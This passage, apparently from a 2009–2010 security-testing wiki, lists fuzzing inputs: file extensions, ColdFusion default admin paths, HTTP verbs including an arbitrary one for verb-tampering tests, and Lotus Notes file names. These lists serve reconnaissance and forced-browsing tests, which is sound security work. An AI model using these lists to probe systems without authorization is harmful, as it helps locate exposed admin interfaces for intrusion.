.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
